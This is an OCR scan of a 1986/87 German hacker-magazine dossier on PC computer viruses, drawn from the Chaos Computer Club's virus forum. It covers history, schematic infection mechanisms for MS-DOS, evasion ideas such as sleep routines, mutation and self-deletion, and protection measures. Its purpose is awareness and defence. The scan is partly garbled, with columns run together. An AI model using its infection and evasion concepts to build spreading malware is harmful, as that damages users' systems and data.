" E i n 'Virus'-Programm, ins Betriebssystem eingepflanzt, gehrt z u m Gefhrlichsten, was ein DV-System b e d r o h t . " Z u dieser Aussage kam die in Ingelheim erscheinende Zeitschrift fr Kommunikations- u n d EDVSicherheit ( K E S ) i m . J u l i 1985. Vorausgegangen war die erste deutschsprachige Verffentlichung ber Computerviren in der Bayrischen Hackerpost (3/85). Seitdem geistert das Thema durch die Fachpresse u n d wird von Insidern hinter vorgehaltener H a n d diskutiert. Alle bisherigen Verffentlichungen zu diesem Thema beruhen a u f Forschungsergebnissen, die Fred C o h e n 1984 an der University o f Southern California erarbeitete. Neuere Erkenntnisse, gerade im H i n b l i c k a u f die z u n e h m e n d e Verbreitung programmkompatibler Personalcomputer (PC's), sind bis heute nicht bekannt geworden. Mitte 1986 tauchten die ersten PC-Viren in Freeware (Programme z u m Tauschen) aus den U S A in der B R D auf. In den Folgemonaten gingen in der Redaktion der D A T E N S C H L E U D E R erstmals in D e u t s c h l a n d programmierte Viren fr Heim- u n d Person a l c o m p u t e r (u.a. M S - D O S ) ein. D i e ersten Programmierer wandten sich a n den C h a o s C o m p u t e r C l u b ( C C C ) - w o h i n sonst? O b w o h l durch entsprechende Verffentlichungen in der Fachpresse eine Sensibilitt f r das Gefahrenpotential der Computervi-

den Systemhusern u n d Softwareanbietern vermutet werden sollte, bewiesen unsere Recherchen das Gegenteil. D i e Systemhuser haben oder wollen die Problematik nicht erkennen. E i n Bewutsein, das zur Information ber Risiken verpflichtet, ist dort bisher nicht vorhanden. Vielmehr ist zu erwarten, d a Industrie u n d H a n d e l das Gefahrenpotential durch Unterlassung von I n f o r m a t i o n fahrlssig frdern. D i e meisten A n w e n d e r v o n P e r s o n a l c o m putern in Industrie, H a n d e l u n d H a n d w e r k sowie alle privaten Nutzer sind somit dieser Entwicklung schutzlos ausgeliefert. D e r C C C sah sich deshalb veranlat, den Chaos Communication Congress '86 ( C C C ' 8 6 ) unter den Schwerpunkt " C o m p u ter-Viren" zu stellen. N u r eine ffentliche Diskussion kann eine Sensibilitt fr diese Entwicklungen frdern u n d Erkenntnisse ber Folgen, Auswirkungen u n d Schutzmglichkeiten s a m m e l n u n d vermitteln. E n d e Dezember wurde in H a m b u r g das weltweit erste ffentliche Diskussionsforum ber Computerviren fr Home- u n d Person a l c o m p u t e r abgehalten. R u n d 200 Hacker, Studenten u n d Computerfreaks, davon ca. 20 Programmierer mit Viren-Erfahrungen n a h m e n an diesem Forum teil. Diese D o k u m e n t a t i o n fat erstmalig Erkenntnisse u n d Diskussionen des VirenFo-

rums zusammen.

ren bei Herstellern von Betriebssystemen, SnfciiSdjfcii&cr


( j f f ^ S i c Srtfciirfjlcit&ct
D S S a i t e FOral

Teil 1 Virus-Grundlagen Geschichtlicher Riickhlick Allgemeines


Der Begriff "ComputerViren" wurde 1983 von Len Adleman an der University of Southern California im Zusammenhang mit Cohens Experimenten geprgt. Als Computer-Virus wird ein Programm bezeichnet, das die Eigenschaft hat, andere Programme zu infizieren. Jedesmal, wenn ein Virus aktiviert wird (z.B. durch Starten eines verseuchten Programms), kopiert es sich selbst in ein anderes, noch nicht infiziertes Programm. Jedes infizierte Programm ist ein Virentrger und steckt bei Aktivierung wiederum weitere, unverseuchte Programme an. Die Infektion breitet sich, biologischen Viren hnlich, lawinenartig in einem DV-System oder Netzwerk aus. Das Virus breitet sich auf den legalen Pfaden aus, es benutzt die Autorisierung der infizierten Programme. Anwender mit hohen Zugriffsrechten auf Netzwerken verschleppen das Virus in alle Teile einer DV-Anlage. Dies sind die ersten entscheidenden Eigenschaften von ComputerViren. Es ist sicher problematisch, fr technische Ablufe biologische Begriffe zu verwenden. Die Bezeichnung "Virus" ist ein Sammelbegriff fr eine besondere Form organischer Strukturen, die sich nur ber eine spezifische Wirtszelle vermehren knnen. Hierin liegt eine gewisse hnlichkeit, denn "ComputerViren" bentigen ebenfalls ein "Wirtsprogramm", das das Virus aufnehmen und verbreiten kann. Obwohl der Vergleich nicht stimmig ist, haben US-Wissenschaftler Begriffe wie "Viren", "Seuchen" und "Infektionen", wegen der hnlichkeiten mit biologischen Ablufen, schon Vorjahren geprgt.

Sprliche Informationen
Bisher lagen nur wenig differenzierte Informationen ber erfolgreiche Experimente mit ComputerViren vor. Fred Cohens Versuche auf mittleren und grossen Rechnern wurden wegen deren Gefhrlichkeit von den Systemverantwortlichen abgebrochen. Versicherungen und Banken, sowie das Militr halten sich mit ihren Erkenntnissen bedeckt. Aus Industriekreisen war nur gerchteweise von erkannten Viren die Rede (wer htte auch den Mut zu sagen: Wir sind verseucht). Professor Dr. Brunnstein ( U N I HH) berichtete auf der Pressekonferenz des CCC'86 von einem Virus auf dem Universittsrechner, der von einem kommerziell genutzten System aus eingegeben wurde. Auch die Technische Universit Berlin vermutete einen Virenbefall und mute Anfang '86 einen 14tgigen Ausfall ihrer IBM/4381 (Grorechner mit komfortablem Betriebssystem) hinnehmen, bis der Betrieb mit einer "sauberen" Systemversion wieder aufgenommen werden konnte.

Fahrlssige Informationspolitik
Es bleibt festzustellen, da ein Bewutsein ber die Bedrohung durch ComputerViren bisher nicht ausgebildet ist. Hinzu kommt, da die Bereiche Heimund Personalcomputer unbeleuchtet blieben. Die Industrie hat bis dato jegliche ffentliche Auseinandersetzung mit diesem Tliema vermieden. Programmierer von PC-Viren, die sich zwecks Infomationsaustausch mit verschiedenen Firmen in Verbindung setzten, ernteten eher Unverstndnis, ("Fr welchen Preis wollen Sie Ihr Virus auf den Markt bringen?") aber keine Basis fr qualifizierte Gesprche. Es drngt sich der Verdacht a u f da bisher keine Abwehrstrategien entwickelt wurden und deshalb dieses Thema absichtlich totgeschwiegen wird. Totschweigen ist bekanntlich kein Abwehrmititel, eher wird der unkontrollierten Verbreitung dadurch Vorschub geleistet. Soweit der geschichtliche Rckblick.

M = ErkennungsMerkmal VIR = Verbreitungsaufgabe (Virulenz) M A N = Manipulationsaufgabe VER = Verschieberoutine

Funktionsweise berschreibender Viren


berschreibende Viren beeintrchtigen oft die Funktionsablufe der infizierten Programme. Das Virus berschreibt einen Teil des vom betroffenen Programm belegtem Speicherplatzes. Dabei wird das Programm zer- oder gestrt, wobei das Virus nicht durch Erhhung des Speicherplatzes auffllt. Um ein ComputerVirus einzuschleusen, wird ein sogenanntes Trgerprogramm mit dem Virus infiziert. Das Trgerprogramm weist bei der Ausfhrung keinen Fehler auf. da das Virus entsprechend sorgfltig eingepat wurde. Wird das Trgerprogramm als ntzliches Hilfsprogramm getarnt, kann die Verbreitung z.B. durch die Neugier des unbedarften Anwenders gestartet werden.

Kein Gefahrenbewutsein
Rdiger Dierstein (DFVLR) beschrieb bereits auf der neunten Datenschutzfachtagung am 14. I I . 85 in Kln wesentliche Aspekte des Virus-Phnomens. "Es ist lngst bekannt, da man Programme schreiben kann, die sich selbst in einem Computersystem reproduzieren. Solche Programme knnen mit bsartigen Eigenschaften versehen sein. Die Reproduktion der Programme samt ihrer unerwnschten Nebenwirkungen kann auf eine Art gestaltet werden, da andere, beliebige Programme zum Trger werden. Es sind "unauffindbare" Viren mglich, Unterprogramme also, die sich einer systematischen Suche durch Eigenmodifikation (sich selbst verndernder Viruscode) entziehen". Dierstein mute sich in der folgenden Diskussion mit "Abwehrreaktionen" auseinandersetzen. Besonders markant fiel die Stellungnahme des IBM-Datenschutzbeauftragten G. Mller aus, der das Virusphnomen als ein theoretisches, in den Softwarelabors lngst gelstes Problem bezeichnete. So wundert es nicht, da trotz ausfhrlicher Informationen ein Gefahrenbewutsein gegenber den ComputerViren nicht ausgebildet ist. Gegenmanahmen werden vom D A T E N S C H U T Z B E R A T E R (5/86) als "eher drftig und konventionell" bezeichnet. Referenten von Sicherheitsseminaren meldeten "eine unglaubliche Ignoranz" verantwortlicher Systembetreiber gegenber der Bedrohung durch ComputerViren. Fr den Bereich der Personalcomputer bleibt festzustellen. da bisher nur der DATENSCHUTZBERATER (10/86) sich dieses Themas angenommen hat. Neue Erkenntnisse waren dort aber ebensowenig zu finden wie in der jngsten Verffentlichung der ComputerPersnlich (24/86).

Teil 2 ! M ! VIR ! MAN ! 1. Programm !

Das PC-Virus

Grundlagen, basierend auf Erfahrungen mit dem Betriebssystem MS-DOS

Wird das I. Programm aktiviert, findet das Virus beim Suchen im Inhaltsverzeichnis des Datenspeichers (vorzugsweise Festplatten) ein 2. Programm. Wenn dieses bereits das ErkennungsMerkmal aufweist, wird weitergesucht.

! 2. Programm Im folgenden sollen, zur Vermittlung der Grundlagen, einige VirusFormen erlutert und auf deren Verbreitungsverhalten eingegangen werden. Darber hinaus werden Hinweise ber mgliche Manipulationsaufgaben und den Schutz gegen ComputerViren gegeben. Die Informationen beziehen sich auf Erfahrungen mit dem Betriebssystem MS-DOS, die auch fr hnliche Betriebssysteme gelten. Der Vir'uskern kopiert das vollstndige Virus in das 2. Programm hinein und berschreibt dabei den fr das Virus bentigten Speicherplatz am Programmanfang. Das genderte Programm wird abgespeichert und die MANipulationsaufgabe des Virus wird ausgefhrt. Erst danach wird das I. Programm ausgefhrt.

Computer-Seuchen
ber sogenannte Seuchen, die mit Hilfe von WirtsProgrammen in DV- Systeme "verschleppt" werden, gibt es Untersuchungen, die zum Teil schon vor 10 Jahren verffentlicht wurden. Bereits in den 70er Jahren berichteten Anderson und Linde ber "Trojanische Pferde", Programme, die gezielt fremde Programme angreifen und dort Funktionsablufe verndern. Im Gegensatz zu ComputerViren verbreiten sich "Trojanische Pferde" nicht ungezielt, sondern greifen gezielt ein ( R E M : if you find wordstar then ersetze funktion sichern gegen lschen).

Funktionsweise einiger ComputerViren


ComputerViren knnen sich auf unlerschiedliche Arten in Programmbestnden verbreiten. Dabei knnen die betroffenen Programme in ihrer ursprnglichen Funktion gestrt werden. Zur Differenzierung erlutern wir, auf der Basis der Erkenntnisse, die Ralf Brger Mitte 1986 dokumentierte, die wesentlichen Unterschiede zwischen berschreibenden nichtberschreibenden und speicheresidenten Viren. Ein ComputerVirus besteht aus mehreren Programmteilen. Um bereits infizierte Programme zu erkennen, versieht das Virus diese Programme mit einem ErkennungsMerkmal (M). Der Programmteil mit der Verbreitungsaufgabe wird als Viruskern (VIR) bezeichnet. Zustzlich kann ber das Virus eine Manipulationsaufgabe ( M A N ) verbreitet werden. Vor der Ausfhrung der ursprnglichen Programmaufgabe muss das betroffene Programm eventuell durch eine Verschieberoutine (VER) wiederhergestellt werden.

! M I VIR ! MAN ! . . . Rest des 2. Programms ! Beim Starten des 2. Programmes findet zuerst die bertragung in das 3. Anwenderprogramm statt. Das 2. Anwenderprogramm arbeitet eventuell fehlerhaft, da Programmteile durch das Virus berschrieben wurden. ! M ! VIR I MAN ! . . . Rest des 3- Programms ! Dieser Verbreitungsvorgang wiederholt sich bis zur iotalen Durchseuchung des Systems. Bei diesem Virus-Typ kann das Virus als das letzte funktionsfhige Programm brigbleiben. Bei geschickter Programmierung des Virus bleiben auch bei berschreibenden Viren einige Programme funktionsfhig. In einem relativ groem Buffer (von Programmen reservierter Speicherplatz) lassen sich Viren gut verstecken. SideKick luft in wesentlichen Funktionen auch mit einem Virus dieser Form. Es stellt dadurch ein Risiko beim Programmtausch dar, denn Viren dieser Form knnen darin unbemerkt verbreitet werden.

Hinterhltige Bedrohung
Die eigentliche Gefahr der Virenprogramme ist, neben der unkontrollierten Verbreitung, die Einschleusung von manipulierenden Programmablufen. Das Virus kann als Programm jedwede vostellbare und programmierbare Manipulationsaufgabe mit sich fhren und verbreiten. Dadurch wird die Gebrauchsfhigkeit der Computer radikal in Frage gestellt. Das Virus kann ungehindert alle Ablufe verndern, verflschen, ersetzen oder vllig andere Aufgaben ausfhren. Eine perfide Form von Computersabotage, gegen die besonders gngige Personalcomputer ungeschtztsind.
DS Saite Schs

<cnMjiciibcr

SntcnStijIcitbcr

DS Saite Siim

Funktionsweise nicht berschreibender Viren


N i c h t b e r s c h r e i b e n d e V i r e n v e r g r e r n d e n Speic h e r p l a t z des i n f i z i e r t e n P r o g r a m m e s . D i e b e t r o f f e nen Programme bleiben funktionsfhig. Z u m Z w e c k d e r E i n s c h l e u s u n g ist ein P r o g r a m m bew u t m i t e i n e m V i r u s i n f i z i e r t w o r d e n . E s tritt b e i d e r A u s f h r u n g kein F e h l e r a u f .

N a c h d e m S t a r t e n d e s 2. P r o g r a m m e s :

Der Phantasie keine Grenze gesetzt. . .


! VER !
D e r P h a n t a s i e eines V i r e n P r o g r a m m i e r e r s s i n d k a u m G r e n z e n gesetzt. D a d a v o n a u s z u g e h e n ist, d a V i r e n , d i e ihre M a n i p u l a t i o n s a u f g a b e g l e i c h n a c h d e m ersten I n f e k t i o n s v o r g a n g b e g i n n e n , relativ schneH auff a l l e n , g e b e n viele P r o g r a m m i e r e r d e n V i r e n e i n e S c h l a f r o u t i n e mit a u f die Reise. So k a n n das Virus eine h o h e Verbreitung finden, bevor die Manipulat i o n in v e r s e u c h t e n S y s t e m e n a u f t r i t t u n d d e r Virusb e f a l l e r k a n n t w i r d . U m d e n U r s p r u n g einer Verseuc h u n g z u v e r d e c k e n , k n n t e n z . B . d i e ersten t a u s e n d infizierten P r o g r a m m e zustzlich einen Regenerat i o n s a u f r a g e r h a l t e n . N o c h v o r I n k r a f t t r e t e n d e s Man i p u l a t i o n a u f t r a g e s l s c h e n sich diese Viren a u s ihren W i r t s p r o g r a m m e n h e r a u s . E i n e A n a l y s e d e s Inf e k t i o n s w e g e s (wer hat w e n v e r s e u c h t ) ist d a d u r c h fast u n m g l i c h .

I M ! VIR I MAN ! 3. Prgrm T. 2 ! 1. Teil

Besondere Formen von ComputerViren


Funktionsweise speicherresidenler Viren. Speicheresidente Viren sind eine Sonderform von C o m p u t e r V i r e n . D e r U n t e r s c h i e d liegt in d e r F o r m , i n d e r sie t t i g w e r d e n . I n d e r V e r b r e i t u n g gilt f r sie praktisch d a s gleiche wie fr alle a n d e r e n Virentypen. B e i m Starten eines infizierten P r o g r a m m e s werden vor Programmausfhrung die Verbreitungsaufgaben, d i e M a n i p u l a t i o n s a u f g a b e u n d die Verschieberoutine des Virus in u n g e n u t z t e Bereiche des Arbeilsspeic h e r s k o p i e r t . D o r t h i n t e r l e g t , w i r d d a s V i r u s seine A u f g a b e n wesentlich flexibler erfllen. I m Arbeitsspeicher hinterlegte P r o g r a m m e (also auch V i r e n ) k n n e n d u r c h e i n e n I n t e r r u p l ( M e l d u n g des Belriebssystems) aktiviert w e r d e n . D a d u r c h k o m m e n d i e s e V i r e n w e s e n t l i c h h u f i g e r z u r A u s f h r u n g als solche, die n u r beim Starten infizierter P r o g r a m m e a u s g e f h r t w e r d e n . S o g e n g t es s c h o n e i n e D i s k e t t e in ein derart verseuchtes System einzulegen. W i r d d i e s e D i s k e t t e v o m B e t r i e b s s y s t e m e r k a n n t , startet d a s V i r u s g l e i c h e i n e n A n g r i f f u n d k o p i e r t s i c h i n ein P r o g r a m m a u f d e m Datentrger. Der Ausbreitungsd r a n g s p e i c h e r e s i d e n t e r V i r e n gilt als u e r s t aggressiv. A l l e a u f d e m b e t r o f f e n e m D V - S y s t e m b e n u t z t e n Disketten k n n e n die " S e u c h e " verschleppen.

V o r t e i l h a f t ist d i e V e r h r e i t u n g s e i g e n s e h a l ' i n u r , w e n n n a c h t r g l i c h in alle P r o g r a m m e z u s t z l i c h e F u n k t i o nen e i n g e b a u t w e r d e n sollen. D i e s e s k n n t e z . B . e i n V i r u s sein, d e r d i e P r o g r a m m e u m e i n e K e n n w o r t a b f r a g e erweitert. M g l i c h ist a u c h ein V i r u s z u r M i t a r b e i t e r k o n t r o l l e . E i n m a l ausgesetzt, liefert dieses Virus f o r t a n g e n a u e N u t z u n g s d a t e n der M i t a r b e i t e r . D a m i t lassen sich U n r e g e l m i g k e i t e n in d e r A n w e n d u n g erkennen ( " Z i m m e r m a n n V i r u s " ) .

\ M 1 VIR ! MAN ! VER I 1. Programm !


D e r Viruskern f i n d e t b e i m S u c h e n e i n 2. P r o g r a m m . W e n n dieses P r o g r a m m d a s E r k e n n u n g s M e r k m a ! aufweist, wird w e i t e r g e s u c h t .

Viren als Diebstahlsschutz


R e c h t l i c h w o m g l i c h z u l s s i g , a b e r d e n n o c h fragw r d i g , s i n d V i r e n als D i e b s t a h l s s c h u t z . S o f t w a r e a n bieter w r e n i n d e r L a g e , a u f M e s s e n i h r e P r o g r a m m e m i t V i r e n z u v e r s e h e n , u m d a d u r c h n a c h einer Entw e n d u n g der Software den Verbreitungsweg von R a u b k o p i e n zu verfolgen.

I 2. Programm (Teil 1 und 2)

Ausschlaggebend ist der Zweck


F r d a s O p f e r ist es v o n w e s e n t l i c h e r B e d e u t u n g festz u s t e l l e n , w e l c h e r Z w e c k m i t e i n e m V i r e n a n g r i f f verf o l g t w i r d . Es k a n n h i l f r e i c h sein, f e s t z u s t e l l e n , o b bes t i m m t e D a t e n z u m Vor- o d e r N a c h t e i l D r i t t e r gezielt verndert wurden, u m den S c h a d e n , die Folgen u n d d e n m g l i c h e n T t e r k r e i s e i n z u g r e n z e n . H a n d e l t es sich " n u r " u m e i n e u n g e z i e l t e V e r s e u c h u n g , so k a n n w o m g l i c h eine hinterlistige S a b o t a g e z u m Vorteil Dritter ausgeschlossen werden. A u f d e m C C C ' 8 6 b e r i c h t e t e n T e i l n e h m e r b e r vers c h i e d e n e M a n i p u l a t i o n s a u f g a b e n v o n V i r e n . S o gibt es V i r e n , d i e D a t e n a u s u n z u g n g l i c h e n S p e i c h e r b e reichen in fr den A n w e n d e r z u g n g l i c h e kopieren. Es w u r d e v o n e i n e m Virus berichtet, der b e r jedes infizierte P r o g r a m m eine " L o g D a t e i " anlegt, in der n o t i e r t w i r d , w e r w a n n m i t w e l c h e m K e n n w o r t dieses P r o g r a m m b e n u t z t h a t . W e i t e r w u r d e v o n V i r e n berichtet, die P r o g r a m m e u n d / o d e r D a t e n zerstren, b z w . verflschen. Sie f i n d e n v o r w i e g e n d in Freeware u n d R a u b k o p i e n Verbreitung. D e r S c h a d e n u n d / o d e r N u t z e n eines V i r u s h n g t v o m E n t w i c k l e r b z w . d e n Verbreitern eines Virus a b . W o h l die H a u p t u r s a c h e fr " R a c h e " sind schlechte soziale Bedingungen fr Programmierer. D a n e b e n f r d e r n N e i d , M i g u n s t u n d O h n m a c h t d i e Bereitschaft z u m bswilligen Vireneinsatz. Die Hauplgef a h r sieht R d i g e r D i e r s t e i n ( D F V L R ) i m vorstzlic h e m H a n d e l n . D i e W a h r s c h e i n l i c h k e i t d u r c h Spielt r i e b ( " M a l s e h e n w a s p a s s i e r t " ) ein S y s t e m z u infiz i e r e n , stellt e b e n s o e i n R i s i k o d a r . Statistisch unw a h r s c h e i n l i c h ist f r D i e r s t e i n a u c h d i e u n a b s i c h t l i c h e G e n e r i e r u n g v o n C o m p u t e r v i r e n a u f d e m eigenen DV-System, z u m Beispiel d u r c h eine A n s a m m l u n g zuflliger Speicherreste.

Um den Speicherplatz a m P r o g r a m m a n f a n g neu zu b e l e g e n , k o p i e r t das V i r u s e i n e n T e i l d e s 2. P r o g r a m mes. w e l c h e r d e r L n g e des V i r u s e n t s p r i c h t , a n d a s E n d e des P r o g r a m m e s .

Vireneigenschaft als Architekturprinzip?


Viren mit kontrollierbaren Verbreitungswegen knnen positiv genutzt werden. I n w i e w e i t die virulente Eigenschaft neue Architekturen in der G e s t a l t u n g v o n Betriebssystemen u n d P r o g r a m m e n e r m g l i c h t , ist n o c h u n b e k a n n t .

! I.Teil ! I.Teil

! 2. Prgrm T. 2 ! 2. Prgrm T. 2

1. Teil

Erkannte Verbreitungswege ComputerViren Risikogruppe Personalcomputer

von

D e r A n f a n g des 2. P r o g r a m m e s ist n u n z w e i m a l vorh a n d e n . Jetzt legt d a s V i r u s h i n t e r d e m a n s E n d e kopierten Programmanfang die Verschieberoutine ( V E R ) ab.

Mutierende Viren
M u t i e r e n d e V i r e n n d e r n bei j e d e m V e r b r e i t u n g s v o r g a n g ihre F o r m . Dieses k a n n eine V e r n d e r u n g der Manipulationsaufgabe sein ( j e d e s Anwenderprog r a m m m a c h t a n d e r e F e h l e r ) o d e r a u c h n u r ein Vert a u s c h e n d e r P r o g r a m m t e i l e eines Virus i n n e r h a l b d e s S p e i c h e r p l a t z e s . M u t i e r e n d e V i r e n k n n t e n sich z . B . selbst i n B a u k a s t e n t e c h n i k b e i j e d e r I n f e k l i o n neu z u s a m m e n s e t z e n . D a d u r c h wird die Suche nach e i n e m erkannten Virus erheblich erschwert.

I.Teil

! 2. Prgrm T. 2 ! 1. Teil

! VER !
der ProAnda- '

D a s V i r u s k o p i e r t sich n u n selbst a n d e n B e g i n n D a t e i u n d b e r s c h r e i b t d a b e i d e n I. Teil d e s g r a m m e s . Es speichert d i e g e n d e r t e V e r s i o n a b . schlieend wird die M A N i p u l a t i o n s a u f g a b e , u n d n a c h das l . P r o g r a m m a u s g e f h r t .

D e r z e i t s i n d alle P e r s o n a l c o m p u t e r f r e i n e n Virenb e f a l l p r d e s t i n i e r t . Z u m e i n e n v e r w e n d e n viele Anw e n d e r C o m p u t e r m i t weit v e r b r e i t e t e n Betriebssys t e m e n (z.B, M S - D O S ) , z u m a n d e r e n t a u s c h e n viele der A n w e n d e r ihre P r o g r a m m e u n t e r e i n a n d e r u n d leisten d e r " V e r s e u c h u n g " d a d u r c h V o r s c h u b .

Verschleppte Seuche
" H u f i g e r D i s k e t t e n t a u s c h m i t w e c h s e l n d e n Partn e r n b i r g t e i n h o h e s I n f e k t i o n s r i s i k o " . D i e bei Personalcomputern am hufigsten bekanntgewordene Verbreitungsform von Viren findet a u f Disketten statt. C o n g r e s s t e i l n e h m e r b e s t t i g t e n , d a F r e e w a r e ( P r o g r a m m e z u m T a u s c h e n ) b i s h e r h u f i g als Seuc h e n t r g e r m i b r a u c h t w u r d e n . D i e s w i r f t l e i d e r ein schlechtes Licht a u f eine an sich positive F o r m der Softwareverbreitung.

! M ! VIR ! MAN ! 2. Prgrm T. 2 ! 1. Teil

! VER !

ngstliche Viren
E i n e b e s o n d e r e A b a r t s i n d V i r e n , d i e b e i e i n e r Aktiv i e r u n g z w e i ( o d e r m e h r e r e ) I n f e k t i o n e n in unvers e u c h t e n P r o g r a m m e n d u r c h f h r e n u n d sich ans c h l i e e n d s e l b s t a u s d e m g e s t a r t e t e n P r o g r a m m entfernen. W i r d d e m A n w e n d e r b e w u t , d a das eben gestartete P r o g r a m m b e f a l l e n ist, ist d i e S e u c h e s c h o n weitergezogen.

Beim Starten des 2. A n w e n d e r p r o g r a m m e s f i n d e t zun c h s t d i e b e r t r a g u n g des V i r u s in d a s 3. A n w e n d e r p r o g r a m m statt. D a n a c h w i r d d i e M A N i p u l a t i o n s a u f g a b e a u s g e f h r t . N u n folgt e i n S p r u n g z u r Vers c h i e b e r o u t i n e . D i e s e R o u t i n e k o p i e r t i m Arbeitss p e i c h e r d e n l . Teil des P r o g r a m m e s w i e d e r a n d e n D a t e i a n f a n g . D a d u r c h w i r d d a s Virus i m Arbeitsspeicher berschrieben.

Vorstzliche Sabotage
H e r k m m l i c h e P e r s o n a l c o m p u t e r b i e t e n oft k e i n e n S c h u t z gegen F r e m d b e n u t z u n g . A n d e n Stellen, w o technische Hilfsmittel (Schlsser, C h i p c a r d ) den Zug r i f f b e g r e n z e n , k n n t e n sich S a b o t e u r e d i e menschliche U n z u l n g l i c h k e i t z u n u t z e m a c h e n . W i r d ein V i r u s i n e i n e m S p i e l p r o g r a m m versteckt, reicht es, d i e D i s k e t t e in d i e N h e d e r D V - A n l a g e z u b r i n g e n . Irg e n d e i n Neugieriger wird das Spiel leichtsinnigerweise ausprobieren.

Die MANipulationsaufgabe
1. Teil 2. Prgrm T. 2 ! 1. Teil ! VER !
D i e V e r b r e i t u n g s f h i g k e i t d e r V i r e n e r m g l i c h t das unkontrollierte Einschleusen von Manipulationsaufg a b e n . D i e s e A u f g a b e n k n n e n frei n a c h d e r Leis t u n g s f h i g k e i t des a u s g e w h l t e n Betriebssystems gestallet werden.

Auch positive Anstze


Inwieweit C o m p u t e r V i r e n auch zu positiven Aufgab e n e i n g e s e t z t w e r d e n k n n e n , h n g t v o n d e r Isolat i o n d e s b e t r o f f e n e n D V - S y s t e m s a b . Z w a r lassen sich V i r e n a u c h mit " g u t e n " Eigenschaften versehen, wie z . B . e i n e R o u t i n e , d i e D a t e n k o m p r i m i e r t u n d dad u r c h den S p e i c h e r b e d a r f senkt. J e d o c h k a n n a u c h e i n s o l c h " g u t e r " V i r u s bei u n k o n t r o l l i e r t e r Verbreit u n g fr rger sorgen.

Im Arbeitsspeicher steht jetzt wieder die Orginalversion des 2. Programmes. Die Verschieberoutine beendet ihre Aufgabe mit einem Sprung zur Startadresse am Dateianfang. Das 2. Programm wird nun fehlerfrei abgearbeitet; das 3. Programm ist infiziert worden. Vor dem Starten des 2. Programmes: ! 3. Programm

Viren knnen ber jede zugngliche Eingabeschnittstelle in eine DV- Anlage gelangen. Dieses knnte die Konsole eines unbeaufsichtigten Terminals sein oder eine Fernzugriffsmglichkeit wie die Fernwartung. Es ist auch denkbar, ComputerViren versteckt in eine zum Abruf angebotene Telesoftware, etwa aus dem Bildschirmtextsystem, auf den eigenen Rechner zu laden.

DS Sait Ach

SitfcirSifjfciibcr

Sufcllftffelltet

DS Saite Noin

Viren sind bei ihrer Ausbreitung nicht auf Schwachstellen oder verdeckte Kanle angewiesen. Ist ein Virus erst einmal in ein DV-System gelangt, breitet es sich auf den legalen Pfaden der Benutzer aus. Wird das Virus als wichtige Utility (Hilfsprogramm) gekennzeichnet, so steigt womglich das Bedrfnis der Anwender dieses Programm zu testen. Auf diesem Wege wird das Virus in alle Zugangsbereiche des jeweiligen Anwenders und/oder des Programmes verschleppt.

Schwer erkennbare Verseuchung


Um ein Virus zu erkennen, mu festgestellt werden, ob das mutmaliche Virus andere Programme infiziert. So einfach diese Regel ist, so schwer ist es, sie zu befolgen. Tatsache ist, da man Programme schreiben kann, von denen nicht feststellbar ist, ob sie sich wie ein Virus verhalten oder nicht. Bei geschickter Programmierung fallen Viren auch nicht durch langsamere Lade- oder Laufzeiten der Programme auf. Viren mit hoher Rechenzeit knnten lokalisiert werden. Klar sollte jedoch sein, da bei aller Sucherei ein einziges berlebendes Virus in den Datenbestnden gengt, um die Infektion erneut zu starten. Vergleichsprozeduren zwischen gesicherten Programmen und den auf aktuellen Festplatten gespeicherten Programmbestnden ermglichen das Erkennen von Unterschieden wie Lnge und Inhalt. Das die "Seuche" auslsende Programm kann aber schon vor Monaten in die gesicherten Datenbestnde bernommen worden sein. Die Verbreitung kann dadurch jederzeit wieder gestartet werden. An dieser Stelle sollte erwhnt werden, da Viren fhig sind, alle Schreibschutzattribute (Ausnahme Hardwareschreibschutz an der Diskette), Datumsund Namenseintrge zu ignorieren, beziehungsweise wieder herzustellen. Ein infiziertes Programm mu auch nicht unbedingt seine genderte Lnge anzeigen; ein fr den C64 entwickelter Virus tuscht die ursprngliche Lnge im Verzeichnis geschickt vor. Eine Hilfe fr Anwender ist ein hardwaremiger zuschaltbarer Schreibschutz fr Festplatten. Damit knnte geprft werden, ob Programme, die nur eine Leseberechtigung haben, unberechtigterweise auf die Festplatte schreiben wollen. Dies ist eine Mglichkeit, bei der Installation neuer Software das Verhalten der Programme zu berprfen. Gegen Viren, die sich erst mit Verzgerung verbreiten, hilft diese arbeitsintensive Methode jedoch nur bedingt.

Schutz vor Viren

"Viren sind dann gut, wenn der Entwickler des Virus das Serum nicht entwickeln kann" so ein Teilnehmer des CCC86.

Unter Umstnden lt sich aus den "verseuchten" Programmbestnden das Virus und deren Manipulationsaufgabe isolieren. Gelingt dies, so besteht Hoffnung, den ordnungsgemen Stand der manipulierten Daten wiederherzustellen. Andernfalls sind die vermutlich manipulierten Datenbestnde Grundlage fr den weiteren Betrieb der DV-Anlage. Zur Verarbeitung der Daten wird eine vollstndig neue Programmoberfiche bentigt. Deshalb sollten alle Programme erneut von den Herstellern angefordert werden. Anzumerken sei an dieser Stelle, da der Geschdigte den Schaden eines Virenbefalls selber tragen mu, wenn er den "Saboteur" nicht berfhren kann. Dies ist auch Voraussetzung fr die Inanspruchnahme blicher "Mibrauchs-Versicherungen". Ein lckenloser Schuldnachweis ist jedoch bei ComputerViren kaum mglich.

Die Funktion des Virus ist ein Ratespiel. Beim Start eines infizierten Programmes meldet sich das Virus "VIRDEM Ver.: 1.0 (Generation ?) aktiv" und fragt eine Zahl ab. Je nach Virengeneration liegt diese Zahl zwischen null und neun. Bei einer Fehleingabe wird das Wirtsprogramm nicht ausgefhrt. V1RDEM.COM wurde entwickelt, um allen MSDOS Anwendern die Mglichkeit zu bieten, sich mit Computerviren zu beschftigen, ohne den Gefahren eines unkontrollierten Virenbefalls ausgesetzt zu sein. Sofern die Handhabungshinweise beachtet werden, besteht keine Gefahr einer unbeabsichtigten Verbreitung. Die Redaktion geht davon aus, da nur mit sehr hohem Aufwand weitere bsartige Manipulationen in den DemoVirus eingebaut werden knnen. Achten Sie trotzdem darauf, aus wessen Hnden Sie das DemoVirus erhalten. Die Redaktion versendet auf Wunsch die Orginalvirendiskette versiegelt.

Mehr Forschung und Information


KES (4/85) ruft zur Intensivierung der Forschung auf diesem Gebiet auf. Forschungsergebnisse sollen zuknftige Entwicklungen von Abwehrmanahmen ermglichen. Ziel ist es: Die Risikoschwelle (schnellere Entdeckung) fr den Eindringling zu erhhen. Weiterhin wurde dort die Erstellung eines SofortManahmen-Katalogs gefordert. Das spiegelte sich auch in den Beitrgen der Congressteilnehmer wieder. Konsens des Congresses ist, da nur durch Aufklrung und Information ein Bewutsein fr diese Entwicklung gefrdert werden kann und mu. Der CCC wird dieses Thema auf einem II. PC-VirenForum im April weiterbehandeln.

Isolierte Systeme
